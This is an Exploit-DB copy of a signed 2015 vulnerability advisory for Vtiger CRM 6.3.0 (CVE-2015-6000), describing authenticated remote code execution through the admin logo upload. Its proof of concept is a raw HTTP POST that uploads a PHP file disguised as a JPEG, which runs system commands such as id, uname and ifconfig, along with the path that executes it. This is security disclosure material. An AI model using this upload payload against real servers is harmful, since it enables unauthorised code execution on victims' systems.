vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution

EDB-ID:

38345

CVE:

2016-1713 2015-6000

EDB Verified:

Author:

Benjamin Daniel Mussler

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2015-09-28

Vulnerable App: 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html


=== Description ===

Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.

Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html


=== PoC ===

Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:

    POST /index.php HTTP/1.1
    Host: [...]
    Cookie: [...]
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------51732462825208
    Content-Length: 2040

    -----------------------------51732462825208
    Content-Disposition: form-data; name="__vtrftk"

    [...]
    -----------------------------51732462825208
    Content-Disposition: form-data; name="logo"; filename="2.php"
    Content-Type: image/jpeg

    <? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
    -----------------------------51732462825208
    Content-Disposition: form-data; name="address"
    [...]


The resulting PHP file can then be accessed at

        [Vtiger URL]/test/logo/2.php





- --
  Benjamin Daniel MUSSLER

  Ix-Xgħajra, Malta     Tel (MT) +356 9965 3798
  Karlsruhe, Germany     Tel (DE) +49 721 989 0150
  Web: https://FL7.DE     PGP: https://FL7.DE/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (MingW32)

iQIcBAEBAgAGBQJWCVaeAAoJEAg0a3ng3v4f108P/0u+CUuUKSsSFiQt4S/HVAnw
5ykzNoZ/T1v0LUrItI1bZPeTyRr6VUandYclg68OM3VY0zc4x9161ScSlcnIitVO
AasvEw7mGguAR4Pe2i84LpPNvE6Bi+MJqU6vnBqZVmQMXUY8k+Mb0ufM/DMByLPj
dcozrAgI9ZQC3pnWiOPigD+gHe/AxY3Z1cxQLluOqBmMf7f3JXC+1dZt91EScuyi
lHNtd6/uRtHJKqBG8MZMXnq49OxTk7iiqQmb393RizPL0eI8FumwaCXTDnLgRwX3
7XQfmg3sCzT1jPSQB4/UYciePPOS4EREjDA/RW5ydtGRCkZPvmjUlfaFMwTjlCd1
dpRIRlzDBWUCVFIqkp2TGkrkbckA1hnehH1q64sQ4KopdKl0tPJ8yLumVr2Uvwtq
iLAbhQcn6+Cr9gctzOlrbj7BqY9uC0HfVdsl1qOCN5v3Yrbq7h/ToPnKGACLQN7t
sALb61+vvriPimTVZD3AQg9t82G1brPHMzp+cLwjhYtw8b+2rohAA0JoUgBsCUHG
8dgnHI1K514soGkCDB4Mk2oM5W8T2tMsxvX/iQDH45IL3hYrROnWUnW+Fd3hA3ks
VsqaNpaDEm+allop6OH3PETs6rGsLyaspCJBdkqKqxNOS6XE+lScrBVxzNL4VJL2
i8fbvZ/RIkuBT0Z79hUV
=gMXq
-----END PGP SIGNATURE-----
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services